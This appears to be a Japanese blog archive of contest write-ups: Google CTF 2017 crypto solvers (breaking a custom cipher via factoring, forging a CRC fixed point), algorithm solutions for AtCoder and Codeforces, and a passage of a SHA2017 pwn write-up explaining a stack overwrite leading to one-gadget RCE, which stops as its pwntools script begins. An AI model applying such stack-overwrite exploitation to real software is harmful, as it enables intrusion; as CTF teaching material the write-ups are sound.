Google Capture The Flag 2017 (Quals): Crypto Backdoor

,

problem

独自の公開鍵暗号の実装 crypto_backdoor.py が与えられるのでflagを割る問題。

solution

与えられたcrypto_backdoor.pyの関数について:

  • I, Sn は文字列 $\leftrightarrow$ 整数の変換/逆変換
  • egcd, modinv は通常のもの
  • double, encrypt は見たまま
  • muladd を繰り返し二乗法で$m$回適用する
  • addは剰余群$\mathbb{Z}/p\mathbb{Z}$の直積の上でなにやら(除算込みの)演算をしている

ここで $A, g, p$が与えられているので$A = \mathrm{mul}(m, g, p)$なる$m$を求められればよい。 つまり除算をしたい。

ここで$p$は素数ではなく、ある程度小さい異なる素数の積に分解できる (http://factordb.com/index.php?query=606341371901192354470259703076328716992246317693812238045286463)。 よって群論の文脈での中華剰余定理 ($m, n \ge 1$が互いに素なら$\mathbb{Z}/mn\mathbb{Z} \cong \mathbb{Z}/m\mathbb{Z} \times \mathbb{Z}/n\mathbb{Z}$) を使って、各巡回群ごとに独立に計算できる。 素因数の大きさが$10^9$程度なので、これは全探索による逆関数の計算が可能。 それぞれで$m_i$を求めれば、$\mathrm{mul}(p, g, p) = g$であることが発見できるのでこれを利用し中華剰余定理で目標の$m$を復元できる。

注意としてはaddでは無理矢理に逆元を取っているので、例えば単位元に相当するものが存在できない (なので無理矢理$-1$として足している)。このあたりを考慮して丁寧に実装しないとバグる。実際、flagは取ったが使った実装はまだバグが埋まってるように見える。$A$から$\mathrm{aliceSecret}$を復元するのは動いたが、同様に動くはずの$B$から$\mathrm{bobSecret}$が出てくれない。

CTF{Anyone-can-make-bad-crypto}

implementation

#!/usr/bin/env python2
import sys
import operator
import functools
import subprocess
import gmpy2
from crypto_backdoor import *

def crt(eqn1, eqn2):
    x1, m1 = eqn1
    x2, m2 = eqn2
    d = int(gmpy2.gcd(m1, m2))
    x = x1 + (m1 // d) * (x2 - x1) * int(gmpy2.invert(m1 // d, m2 // d))
    m = int(gmpy2.lcm(m1, m2))
    return x % m, m

def div(a, g, p):
    if a == g:
        return 1
    # known = [
    #     24598024,
    #     71971632,
    #     73353382,
    #     97096718,
    #     111512372,
    #     147499822,
    #     217014904,
    #     418335728,
    #     445387078,
    #     468722272,
    #     749957078,
    #     793852246,
    #     927343918,
    #     934896152,
    # ]
    # for m in known:
    #     if mul(m, g, p) == a:
    #         return m
    proc = subprocess.Popen([ './a.out' ], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=sys.stderr)
    s = ''
    s += '%d %d\n' % a
    s += '%d %d\n' % g
    s += '%d\n' % p
    s, _ = proc.communicate(s)
    m = int(s)
    assert mul(m, g, p) == a
    return m

# http://factordb.com/index.php?query=606341371901192354470259703076328716992246317693812238045286463
factors = [
    901236131,
    911236121,
    921236161,
    931235651,
    941236273,
    951236179,
    961236149,
]
assert p == functools.reduce(operator.mul, factors)

# solve in the small spaces
eqns = []
for p0 in factors:
    g0 = (g[0] % p0, g[1] % p0)
    A0 = (A[0] % p0, A[1] % p0)
    assert mul(p0, g0, p0) == g0
    m = div(A0, g0, p0)
    assert mul(m, g0, p0) == A0
    assert mul(m + p0-1, g0, p0) == A0
    eqns += [ ( m, p0-1 ) ]

# reconstruct the secret using CRT
m, _ = functools.reduce(crt, eqns)
print('aliceSecret', m)
aliceSecret = m
assert A == mul(aliceSecret, g, p)

# decode flag
aliceMS = mul(aliceSecret, B, p)
masterSecret = aliceMS[0] * aliceMS[1]
length = 31
encrypted_message = 137737300119926924583874978524079282469973134128061924568175107915062758827931077214500356470551826348226759580545095568667325
flag = Sn(encrypted_message ^ masterSecret, length)
print('flag', flag)
assert length == len(flag)
assert encrypted_message == I(flag) ^ masterSecret
#include <cassert>
#include <cstdio>
#include <tuple>
using ll = long long;
using namespace std;

inline int modadd(int a, int b, int mod) { int c = a + b; return c < mod ? c : c - mod; }
inline int modsub(int a, int b, int mod) { int c = a - b; return c >= 0 ? c : c + mod; }

pair<int, int> extgcd(int a, int b) {
    if (b == 0) return { 1, 0 };
    int na, nb; tie(na, nb) = extgcd(b, a % b);
    return { nb, na - a/b * nb };
}
int modinv(int a, int n) { // a and n must be relatively prime, O(log n)
    assert (1 <= a and a < n);
    return modsub(extgcd(a, n).first % n, 0, n);
}

struct point { int x, y; };
bool operator != (point const & a, point const & b) {
    return a.x != b.x or a.y != b.y;
}
struct zero_exception {};
point add(point const & a, point const & b, int p) {
    int a_z = modsub(a.x, a.y, p);
    int b_z = modsub(b.x, b.y, p);
    ll denom = modsub(modadd(a_z, b_z, p), 1, p);
    if (denom == 0) {
        throw zero_exception {};
    }
    ll denom_inv = modinv(denom, p);
    ll c_z = a_z *(ll) b_z % p * denom_inv % p;
    ll c_y = a.y *(ll) b.y % p * denom_inv % p;
    return { modadd(c_z, c_y, p), int(c_y) };
}

int main() {
    point a; scanf("%d%d", &a.x, &a.y);
    point g; scanf("%d%d", &g.x, &g.y);
    int p; scanf("%d", &p);
fprintf(stderr, "a = (%d, %d)\n", a.x, a.y);
fprintf(stderr, "g = (%d, %d)\n", g.x, g.y);
fprintf(stderr, "p = %d\n", p);
fprintf(stderr, "find the m such that a = mg\n");
    point b = g;
    ll m = 1;
    while (b != a) {
if (m % 10000000 == 0) fprintf(stderr, "trying %lld...\n", m);
        try {
            b = add(b, g, p);
            ++ m;
        } catch (zero_exception) {
            b = add(b, add(g, g, p), p);
            m += 2;
        }
        assert (0 <= b.x and b.x < p);
        assert (0 <= b.y and b.y < p);
        assert (m < p);
    }
fprintf(stderr, "found m = %lld\n", m);
    printf("%lld\n", m);
    return 0;
}

Google Capture The Flag 2017 (Quals): Introspective CRC

,

problem

$ nc selfhash.ctfcompetition.com 1337
0101010101010101010101010101010101010101010101010101010101010101010101010101010101 
Give me some data: 
Check failed.
Expected: 
    crc_82_darc(data) == int(data, 2)
Was:
    3885922831092520253093991L
    1611901092819505566274901L

solution

f = lambda x: crc_82_darc(bin(x)[2 :].zfill(82))

とすると、この関数$f : 2^{82} \to 2^{82}$の不動点を探せばよい。 特に、$x \mapsto f(x) \oplus f(0)$は線形。

したがって、線形な関数$g(x) = f(x) \oplus f(0) \oplus x$に対し$g(x) = f(0)$となるような自然数$x \lt 2^{82}$を探せばよい。 線形性より基底$\{ 1, 2, 4, \dots, 2^k, \dots, 2^{81} \}$に対する$g(1), g(2), g(4), \dots, g(2^k), \dots, g(2^{81})$だけ見ればよい。 特に$2^{81}$をvector空間と見て一次変換$g$を行列表示$A = g$して$y = f(0)$とおけば、単に$y = Ax$を解くだけとなる。 Gaussの消去法により$x$は得られ、これが答え。

CTF{i-hope-you-like-linear-algebra}

implementation

#!/usr/bin/env python3
import copy
import random

def gaussian_elimination(a, b):
    n = len(a)
    a = copy.deepcopy(a)
    b = copy.deepcopy(b)
    for y in range(n):
        pivot = y
        while pivot < n and not a[pivot][y]:
            pivot += 1
        if pivot == n:
            continue
        assert pivot < n
        a[y], a[pivot] = a[pivot], a[y]
        b[y], b[pivot] = b[pivot], b[y]
        assert a[y][y] == 1
        for ny in range(n):
            if ny != y and a[ny][y]:
                for x in range(y+1, n):
                    a[ny][x] ^= a[y][x]
                b[ny] ^= b[y]
    return b

# crc_82_darc
n = 82
def crc_82_darc(data):
    poly = 0x220808a00a2022200c430
    c = 0
    for i, data_i in enumerate(data):
        c ^= ord(data_i)
        for _ in range(8):
            low = c & 1
            c >>= 1
            if low:
                c ^= poly
    return c

# make a linear function
def f(x):
    data = bin(x)[2 :].zfill(n)
    return crc_82_darc(data)
def g(x):
    return f(x) ^ f(0) ^ x
def fmt(x):
    return bin(x)[2 :].zfill(n)
assert g(0) == 0
for _ in range(100):
    x = random.randint(0, 2 ** n - 1)
    y = random.randint(0, 2 ** n - 1)
    assert g(x) ^ g(y) == g(x ^ y)

# solve the matrix
a = [ [ None for _ in range(n) ] for _ in range(n) ]
for y in range(n):
    for x in range(n):
        a[y][x] = int(fmt(g(2 ** x))[y])
b = list(map(int, fmt(f(0))))
c = gaussian_elimination(a, b)

# done
x = int(''.join(map(str, reversed(c))), 2)
print(fmt(x))
assert f(x) == x

AtCoder Grand Contest 005: E - Sugigma: The Showdown

,

http://agc005.contest.atcoder.jp/tasks/agc005_e

答え見たけどしばらくしていい感じに記憶が薄れた後に実装したのでまあはい。

solution

追う側の青い辺による根付き木を中心に考える。$O(N)$。

追う側は常に(自分の木の上で)近付く方向に移動するとしてよい。そうでないなら逃げる側はパスすればよいため。 逃げる側の赤い辺$i - j$で青い木上の距離$d(i, j) \ge 3$なものがあれば、逃げる側は頂点$i, j$の上にいる状態で手番が回って来たら逃げ切りが確定する。 まとめると逃げ切りの判定は、頂点$Y$からの距離$t = d(Y, i)$が頂点$X$からの距離より真に小さい$t \lt d(X, i)$頂点$i$だけを通って逃げ切りができる頂点へ辿り着けるかどうかでよい。 これは$O(N)$。逃げ切れる頂点に辿り着けない場合は青い木の葉まで移動して捕まるのを待つことになるので、同様に移動できる頂点の中で$t = d(X, i)$が最大のものを覚えておき$2t$が答え。

implementation

#include <cstdio>
#include <stack>
#include <tuple>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
using namespace std;
template <class T> inline void setmax(T & a, T const & b) { a = max(a, b); }
template <typename X, typename T> auto vectors(X x, T a) { return vector<T>(x, a); }
template <typename X, typename Y, typename Z, typename... Zs> auto vectors(X x, Y y, Z z, Zs... zs) { auto cont = vectors(y, z, zs...); return vector<decltype(cont)>(x, cont); }

vector<int> compute_dist(int root, vector<vector<int> > const & g) {
    int n = g.size();
    vector<int> dist(n, -1);
    stack<int> stk;
    dist[root] = 0;
    stk.push(root);
    while (not stk.empty()) {
        int i = stk.top(); stk.pop();
        for (int j : g[i]) if (dist[j] == -1) {
            dist[j] = dist[i] + 1;
            stk.push(j);
        }
    }
    return dist;
}
vector<int> compute_parent(int root, vector<vector<int> > const & g) {
    int n = g.size();
    vector<int> parent(n, -1);
    stack<int> stk;
    stk.push(root);
    while (not stk.empty()) {
        int i = stk.top(); stk.pop();
        for (int j : g[i]) if (parent[j] == -1 and j != root) {
            parent[j] = i;
            stk.push(j);
        }
    }
    return parent;
}

int main() {
    // input
    int n, x, y; scanf("%d%d%d", &n, &x, &y); -- x; -- y;
    vector<vector<int> > g(n);
    repeat (i, n-1) {
        int a, b; scanf("%d%d", &a, &b); -- a; -- b;
        g[a].push_back(b);
        g[b].push_back(a);
    }
    vector<vector<int> > h(n);
    repeat (i, n-1) {
        int c, d; scanf("%d%d", &c, &d); -- c; -- d;
        h[c].push_back(d);
        h[d].push_back(c);
    }
    // solve
    vector<int> dist_h = compute_dist(y, h);
    vector<int> parent_h = compute_parent(y, h);
    vector<bool> escapable(n);
    repeat (i, n) for (int j : g[i]) {
        if (parent_h[i] != j
                and parent_h[j] != i
                and parent_h[i] != parent_h[j]
                and (parent_h[i] == -1 or parent_h[parent_h[i]] != j)
                and (parent_h[j] == -1 or parent_h[parent_h[j]] != i)) { // dist(i, j) >= 3
            escapable[i] = true;
            escapable[j] = true;
        }
    }
    int result = 0;
    vector<bool> used(n);
    stack<pair<int, int> > que;
    que.emplace(x, 0);
    while (not que.empty()) {
        int i, dist; tie(i, dist) = que.top(); que.pop();
        setmax(result, dist_h[i] * 2);
        if (escapable[i]) {
            result = -1;
            break;
        }
        for (int j : g[i]) if (not used[j]) {
            used[j] = true;
            if (dist_h[j] <= dist + 1) continue;
            que.emplace(j, dist + 1);
        }
    }
    // output
    printf("%d\n", result);
    return 0;
}

Codeforces Round #419 (Div. 1): B. Karen and Test

,

九条カレンちゃん回だった。ratingは$+54$して$2146$で王手。

solution

線形性。実験。$N \equiv 1 \mod 4$のときがとても綺麗な形になるので、高々$3$回愚直にやったあと規則性。$O(N \log N)$。

長さ$N$の数列$a = ( a_i )_{i \lt N}$を処理するが操作は全て線形。 数列$e_i$を$i$番目の項だけ$1$でそれ以外$0$な列とすると、答え$f(a) = \sum_{i \lt N} a_i f(e_i)$となる。 このような入力$e_i$に関して実験する。 $N \equiv 1 \mod 4$のとき、$0$-basedで奇数番目の$f(e_i) = 0$、偶数$2i$番目なら$f(e_i) = {}_{N/2}C_{i/2}$が分かる。 よって$O(N \log N)$。

implementation

#include <cassert>
#include <cstdio>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_from(i, m, n) for (int i = (m); (i) < int(n); ++(i))
using ll = long long;
using namespace std;

ll powmod(ll x, ll y, ll p) { // O(log y)
    assert (0 <= x and x < p);
    assert (0 <= y);
    ll z = 1;
    for (ll i = 1; i <= y; i <<= 1) {
        if (y & i) z = z * x % p;
        x = x * x % p;
    }
    return z;
}
ll inv(ll x, ll p) { // p must be a prime, O(log p)
    assert ((x % p + p) % p != 0);
    return powmod(x, p-2, p);
}
template <int mod>
int fact(int n) {
    static vector<int> memo(1,1);
    if (memo.size() <= n) {
        int l = memo.size();
        memo.resize(n+1);
        repeat_from (i,l,n+1) memo[i] = memo[i-1] *(ll) i % mod;
    }
    return memo[n];
}
template <int mod>
int choose(int n, int r) { // O(n) at first time, otherwise O(\log n)
    if (n < r) return 0;
    r = min(r, n - r);
    return fact<mod>(n) *(ll) inv(fact<mod>(n-r), mod) % mod *(ll) inv(fact<mod>(r), mod) % mod;
}

constexpr int mod = 1e9+7;
int main() {
    int n; scanf("%d", &n);
    vector<int> a(n); repeat (i, n) scanf("%d", &a[i]);
    {
        int op = +1;
        while (n % 4 != 1) {
            vector<int> b(n-1);
            repeat (i, n-1) {
                b[i] = (a[i] + op * a[i+1] +(ll) mod) % mod;
                op *= -1;
            }
            -- n;
            a = move(b);
        }
        assert (a.size() == n);
    }
    ll result = 0;
    repeat (i, n/2+1) {
        result += a[2*i] *(ll) choose<mod>(n/2, i) % mod;
    }
    result %= mod;
    printf("%lld\n", result);
    return 0;
}

Codeforces Round #419 (Div. 1): A. Karen and Game

,

http://codeforces.com/contest/815/problem/A

ストーリー短くて読みやすいなあと思ってたら誤読してた。 hackしてくれた人に感謝。

solution

ある列/行$x$を見てその最小値が正ならrow x/col xを貪欲にするので(ほとんど)よい。 ただし回数は最小化する必要があることに注意して、この部分だけ適当にする。$O(NM)$。

implementation

#include <algorithm>
#include <climits>
#include <cstdio>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using namespace std;
template <class T> inline void setmin(T & a, T const & b) { a = min(a, b); }
template <typename X, typename T> auto vectors(X x, T a) { return vector<T>(x, a); }
template <typename X, typename Y, typename Z, typename... Zs> auto vectors(X x, Y y, Z z, Zs... zs) { auto cont = vectors(y, z, zs...); return vector<decltype(cont)>(x, cont); }

int main() {
    int h, w; scanf("%d%d", &h, &w);
    vector<vector<int> > g = vectors(h, w, int()); repeat (y, h) repeat (x, w) scanf("%d", &g[y][x]);
    int base = INT_MAX;
    repeat (y, h) {
        repeat (x, w) {
            setmin(base, g[y][x]);
        }
    }
    repeat (y, h) {
        repeat (x, w) {
            g[y][x] -= base;
        }
    }
    vector<int> row(h);
    repeat (y, h) {
        row[y] = *whole(min_element, g[y]);
        repeat (x, w) g[y][x] -= row[y];
    }
    vector<int> col(w);
    repeat (x, w) {
        col[x] = INT_MAX;
        repeat (y, h) setmin(col[x], g[y][x]);
        repeat (y, h) g[y][x] -= col[x];
    }
    bool is_cleared = true;
    repeat (y, h) {
        repeat (x, w) {
            if (g[y][x] != 0) {
                is_cleared = false;
            }
        }
    }
    if (is_cleared) {
        int n = 0;
        n += base * min(h, w);
        repeat (y, h) n += row[y];
        repeat (x, w) n += col[x];
        printf("%d\n", n);
        if (h < w) {
            repeat (y, h) repeat (i, base) printf("row %d\n", y+1);
        } else {
            repeat (x, w) repeat (i, base) printf("col %d\n", x+1);
        }
        repeat (y, h) repeat (i, row[y]) printf("row %d\n", y+1);
        repeat (x, w) repeat (i, col[x]) printf("col %d\n", x+1);
    } else {
        printf("-1\n");
    }
    return 0;
}

AtCoder Grand Contest 012: E - Camel and Oases

,

http://agc012.contest.atcoder.jp/tasks/agc012_e

solution

ジャンプできるのは$k \approx \log V$回。 $i$回目のジャンプのあとに相互に移動できるオアシスの区間をそれぞれ求めておく。 何回目のジャンプを使ったかの集合$s \in \mathcal{P}(k)$からそれで(左端/右端から)どこまでいけるかの関数$r, l : \mathcal{P}(k) \to N+1$を計算する。 部分集合を全部試しても$2^k \approx 2^{\log V} = V$で間に合う。 初期位置が指定されたときはその連結成分を始めに使うことになるので、初期位置から到達できるオアシスの区間$[l, r]$に対しある集合$s \subseteq \mathcal{P}(k-1)$で$l \le r(s) \land l(\mathcal{P}(k-1) \setminus s) \le r$なものが存在するかどうか見ればよい。 $O(N \log V + V (\log V)^2)$。

implementation

#include <cstdio>
#include <vector>
#include <algorithm>
#include <tuple>
#include <cassert>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using ll = long long;
using namespace std;
template <class T> inline void setmax(T & a, T const & b) { a = max(a, b); }
template <class T> inline void setmin(T & a, T const & b) { a = min(a, b); }

template <typename UnaryPredicate>
ll binsearch(ll l, ll r, UnaryPredicate p) { // [l, r), p is monotone
    assert (l < r);
    -- l;
    while (r - l > 1) {
        ll m = (l + r) / 2;
        (p(m) ? r : l) = m;
    }
    return r; // = min { x | p(x) }
}

int main() {
    int n, v; scanf("%d%d", &n, &v);
    vector<int> x(n); repeat (i, n) scanf("%d", &x[i]);

    vector<int> vs;
    for (int cur_v = v; cur_v > 0; cur_v /= 2) vs.push_back(cur_v);
    vs.push_back(0);
    whole(reverse, vs);
    int k = vs.size();

    vector<vector<pair<int, int> > > range(k); // [l, r]
    repeat (l, n) {
        range[0].emplace_back(l, l);
    }
    repeat (i, k-1) {
        int v = vs[i+1]; // shadowing
        for (int j = 0; j < range[i].size(); ) {
            int l1, r1; tie(l1, r1) = range[i][j];
            ++ j;
            while (j < range[i].size()) {
                int l2, r2; tie(l2, r2) = range[i][j];
                assert (r1 + 1 == l2);
                if (x[l2] - x[r1] <= v) {
                    r1 = r2;
                    ++ j;
                } else {
                    break;
                }
            }
            range[i+1].emplace_back(l1, r1);
        }
    }

    vector<int> dp_l(1 << (k-1)); // [0, r)
    vector<int> dp_r(1 << (k-1), n-1); // (l, n-1]
    repeat (s, 1 << (k-1)) {
        repeat (i, k-1) if (not (s & (1 << i))) {
            int t = s | (1 << i);
            int jr = binsearch(0, range[i].size(), [&](ll j) {
                int l, r; tie(l, r) = range[i][j];
                return dp_l[s] < l;
            }) - 1;
            int jl = binsearch(0, range[i].size(), [&](ll j) {
                int l, r; tie(l, r) = range[i][j];
                return dp_r[s] <= r;
            });
            setmax(dp_l[t], jr < range[i].size() ? range[i][jr].second + 1 :  n);
            setmin(dp_r[t], jl < range[i].size() ? range[i][jl].first  - 1 : -1);
        }
    }

    for (auto it : range[k-1]) {
        int l, r; tie(l, r) = it;
        bool possible = false;
        repeat (s, 1 << (k-1)) {
            int t = ((1 << (k-1)) - 1) & ~ s;
            if (l <= dp_l[s] and dp_r[t] <= r) {
                possible = true;
                break;
            }
        }
        repeat (i, r - l + 1) {
            printf("%s\n", possible ? "Possible" : "Impossible");
        }
    }
    return 0;
}

AtCoder Grand Contest 012: D - Colorful Balls

,

http://agc012.contest.atcoder.jp/tasks/agc012_d

solution

入れ換え可能関係は推移的。 もっとも入れ換えしやすい軽いボールのみ考えればよい。 $O(N)$。

各色$c$ごとに、その色で最も軽いボールの重さを$w_c$とすれば$w_c + w_i \le X$を満たすような$c$色のボール$i$たち同士は自由に入れ換え可能。 全体で最も軽いボールの重さを$w_c$その色を$c$とすると、$c$以外の色$d$に対し$w_c + w_i \le X$を満たすような$d$色のボール$i$たち同士は自由に入れ換え可能。 全体で$2$番目に軽いボールについても同様。 このとき複数の色を含む連結成分は唯一で、その成分にそれぞれの色のボールが何個づつ入っているかが分かれば答えが出せる。

implementation

$O(N \log N)$で書いた。

#include <algorithm>
#include <cassert>
#include <climits>
#include <cstdio>
#include <numeric>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_from(i, m, n) for (int i = (m); (i) < int(n); ++(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using ll = long long;
using namespace std;
template <class T> inline void setmin(T & a, T const & b) { a = min(a, b); }

ll powmod(ll x, ll y, ll p) { // O(log y)
    assert (0 <= x and x < p);
    assert (0 <= y);
    ll z = 1;
    for (ll i = 1; i <= y; i <<= 1) {
        if (y & i) z = z * x % p;
        x = x * x % p;
    }
    return z;
}
ll inv(ll x, ll p) { // p must be a prime, O(log p)
    assert ((x % p + p) % p != 0);
    return powmod(x, p-2, p);
}
template <int mod>
int fact(int n) {
    static vector<int> memo(1,1);
    if (memo.size() <= n) {
        int l = memo.size();
        memo.resize(n+1);
        repeat_from (i,l,n+1) memo[i] = memo[i-1] *(ll) i % mod;
    }
    return memo[n];
}
template <int mod>
int choose(int n, int r) { // O(n) at first time, otherwise O(\log n)
    if (n < r) return 0;
    r = min(r, n - r);
    return fact<mod>(n) *(ll) inv(fact<mod>(n-r), mod) % mod *(ll) inv(fact<mod>(r), mod) % mod;
}

constexpr int mod = 1e9+7;
int main() {
    int n, x, y; scanf("%d%d%d", &n, &x, &y);
    vector<vector<int> > w(n);
    repeat (i, n) {
        int c, w_i; scanf("%d%d", &c, &w_i); -- c;
        w[c].push_back(w_i);
    }
    vector<pair<int, int> > min_balls;
    repeat (c, n) if (not w[c].empty()) {
        whole(sort, w[c]);
        min_balls.emplace_back(w[c][0], c);
        whole(sort, min_balls);
        if (min_balls.size() >= 3) min_balls.pop_back();
    }
    if (min_balls.size() == 1) {
        printf("%d\n", 1); // all balls have the same color
        return 0;
    }
    assert (min_balls.size() == 2);
    int min_w = min_balls[0].first;
    int min_w_color = min_balls[0].second;
    int second_w = min_balls[1].first;
    vector<int> connected;
    repeat (c, n) if (not w[c].empty()) {
        int x_connected = whole(upper_bound, w[c], x - w[c][0])  - w[c].begin();
        int y_connected = whole(upper_bound, w[c], y - min_w)    - w[c].begin();
        if (c == min_w_color and second_w != min_w) {
            y_connected = whole(upper_bound, w[c], y - second_w) - w[c].begin();
        }
        if (y_connected) {
            connected.push_back(max(x_connected, y_connected));
        }
    }
    ll result = 1;
    int a = whole(accumulate, connected, 0);
    for (int b : connected) {
        result = result * choose<mod>(a, b) % mod;
        a -= b;
    }
    printf("%lld\n", result);
    return 0;
}

AtCoder Grand Contest 012: B - Splatter Painting

,

http://agc012.contest.atcoder.jp/tasks/agc012_b

solution

クエリを後ろから処理し積極的に枝刈りする。$D = \max d_i \le 10$の制約から$O(Q + (N + M) D)$で間に合う。

それぞれの頂点で、その頂点$v$から距離$d$以内の頂点が全て塗られているような値$d_v$を(保守的に)持たせておく。 これはその頂点に(直接あるいは間接的に)来たクエリの値を覚えておくだけ。 後ろから処理していくので、覚えている距離$d_v$よりクエリの値$d_i$が小さいならその場で打ち切れる。 打ち切られずに処理が走るのは高々$\max d_i$回だけなので、これは計算量を落とす。

implementation

#include <cstdio>
#include <queue>
#include <tuple>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define repeat_reverse(i, n) for (int i = (n)-1; (i) >= 0; --(i))
using namespace std;

int main() {
    // input
    int n, m; scanf("%d%d", &n, &m);
    vector<vector<int> > g(n);
    repeat (i, m) {
        int a, b; scanf("%d%d", &a, &b); -- a; -- b;
        g[a].push_back(b);
        g[b].push_back(a);
    }
    int q; scanf("%d", &q);
    vector<int> v(q), d(q), c(q); repeat (t, q) { scanf("%d%d%d", &v[t], &d[t], &c[t]); -- v[t]; }
    // solve
    vector<int> result(n);
    vector<int> used(n, -1);
    repeat_reverse (t, q) {
        queue<int> que;
        auto push = [&](int i, int dist) {
            if (used[i] < dist) {
                used[i] = dist;
                if (not result[i]) result[i] = c[t];
                que.emplace(i);
            }
        };
        push(v[t], d[t]);
        while (not que.empty()) {
            int i = que.front(); que.pop();
            if (used[i] != 0) {
                for (int j : g[i]) {
                    push(j, used[i]-1);
                }
            }
        }
    }
    // output
    repeat (i, n) {
        printf("%d\n", result[i]);
    }
    return 0;
}

AtCoder Grand Contest 012: A - AtCoder Group Contest

,

http://agc012.contest.atcoder.jp/tasks/agc012_a

solution

貪欲。$O(N \log N)$。

強さが$x_1 \le x_2 \le x_3, \; y_1 \le y_2 \le y_3$な組$(x_1, x_2, x_3), \; (y_1, y_2, y_3)$があるとする。不等式を保ったまま適当に組み換えて$\max \{ x_1, y_1 \} \le \min \{ x_2, y_2 \}$にできて、このとき$x_2 + y_2$が最大で$y_3 \le x_2 \lor x_3 \le y_2$となる。 つまり長さが$3N$のとき、sortした後に組$(a_1, a_{3N-1}, a_{3N})$で作るのが最善。

implementation

#include <algorithm>
#include <cstdio>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
#define whole(f, x, ...) ([&](decltype((x)) whole) { return (f)(begin(whole), end(whole), ## __VA_ARGS__); })(x)
using ll = long long;
using namespace std;

int main() {
    int n; scanf("%d", &n);
    vector<int> a(3*n); repeat (i, 3*n) scanf("%d", &a[i]);
    whole(sort, a);
    ll result = 0;
    repeat (i, n) {
        result += a[3*n-1 - (2*i+1)];
    }
    printf("%lld\n", result);
    return 0;
}

AtCoder Grand Contest 013: E - Placing Squares

,

http://agc013.contest.atcoder.jp/tasks/agc013_e

$N = 10^9$で剰余が実質ないのでぎりぎり通せる。 意図せず最短コードを得た。

solution

差分を取って線形な形にしてDP。定数倍最適化。$O(N)$。

愚直なDPを考えると$\mathrm{dp}_{r}$は区間$[0, r]$での結果と定義し$\mathrm{dp}_{N}$が全体の答え。 印が付いている位置では$\mathrm{dp}_{r} = 0$、それ以外では漸化式$\mathrm{dp}_{r} = \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r - l)^2$となる。 これを愚直にやると$O(N^2)$。

以下のように変形する。 $$ \begin{array}{ccl} \mathrm{dp}_{r+1} & = & \sum_{0 \le l \lt r+1} \mathrm{dp}_{l}(r+1 - l)^2 \\ & = & \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r+1 - l)^2 + \mathrm{dp}_{r} \\ & = & \sum_{0 \le l \lt r} \mathrm{dp}_{l}((r-l)^2 + 2(r-l) + 1) + \mathrm{dp}_{r} \\ & = & \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r-l)^2 + 2 \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r-l) + \sum_{0 \le l \lt r} \mathrm{dp}_{l} + \mathrm{dp}_{r} \\ \end{array} $$

ここで次のように定義すると、それぞれ単純な漸化式で計算できる。

  • $\mathrm{dp’}_{r} = \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r - l)$
  • $\mathrm{dp”}_{r} = \sum_{0 \le l \lt r} \mathrm{dp}_{l}$

また$\hat{\mathrm{dp}}_{r} = \sum_{0 \le l \lt r} \mathrm{dp}_{l}(r-l)^2$とする。印が付いている位置を考えれば、これは$\mathrm{dp}$とは必ずしも一致しないことに注意。 これにより、

$$ \mathrm{dp}_{r+1} = \hat{\mathrm{dp}}_{r} + \mathrm{dp’}_{r} + \mathrm{dp”}_{r} + \mathrm{dp}_{r} $$

このようにすれば組$(\hat{\mathrm{dp}}_{r}, \mathrm{dp’}_{r}, \mathrm{dp”}_{r}, \mathrm{dp}_{r})$から$(\hat{\mathrm{dp}}_{r+1}, \mathrm{dp’}_{r+1}, \mathrm{dp”}_{r+1}, \mathrm{dp}_{r+1})$を得るのは$O(1)$となる。 よって全体で$O(N)$で解ける。

implementation

  • 毎回if (x >= mod) x -= mod;よりもまとめてx %= mod;の方が速かった。分岐予測の影響か
  • if (j < m and x[j] == i+1) ...よりも番兵を置いてif (x[j] == i+1) ...の方が速かった。それはそう
  • x[j]よりもint x_j = x[j];をおいた方が速かった。これはコンパイラがしてくれてもよさそう
#include <cstdio>
#include <vector>
#define repeat(i, n) for (int i = 0; (i) < int(n); ++(i))
using ll = long long;
using namespace std;

constexpr int mod = 1e9+7;
int main() {
    // input
    int n, m; scanf("%d%d", &n, &m);
    vector<int> x(m+1); repeat (i, m) scanf("%d", &x[i]); // x[m] is a sentinel
    // solve
    ll result = 1;
    ll preserved = 0;
    ll delta = 0;
    ll acc = 0;
    int j = 0;
    int x_j = x[j];
    repeat (i, n) {
        acc += result;
        preserved += 2 * delta + acc;
        delta += acc;
        if (i % 17 == 0) {
            preserved %= mod;
            delta %= mod;
            acc %= mod;
        }
        result = preserved;
        if (x_j == i+1) {
            result = 0;
            x_j = x[++ j];
        }
    }
    // output
    printf("%lld\n", result % mod);
    return 0;
}


SHA2017 CTF Teaser: maze

,

guessingなどはなく正しくpwnではあるが、なんだか手間な感じがありあまり好きでない。

problem

  • 迷路を探索するやつ
  • 各座標ごとにアイテムが置いてあって拾ったり置いたりできる
  • 座標ごとのアイテムの数はスタック上にある

solution

座標の範囲チェックはないので、迷路の外に出てアイテムを拾ったり置いたりすればスタックを勝手に書き換えられる。 libc baseはrspより低位の側を見れば <_IO_fgets+173> として見つかる。 return addr は room $1060$。stackに$0$をたくさん作れるのでone gadget RCEすれば刺さる。 room $1060$への移動はなんだか運っぽいので適当にする。

implementation

#!/usr/bin/env python2
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs='?', default='maze.stillhackinganyway.nl')
parser.add_argument('port', nargs='?', default=8001, type=int)
parser.add_argument('--log-level', default='debug')
parser.add_argument('--binary', default='maze')
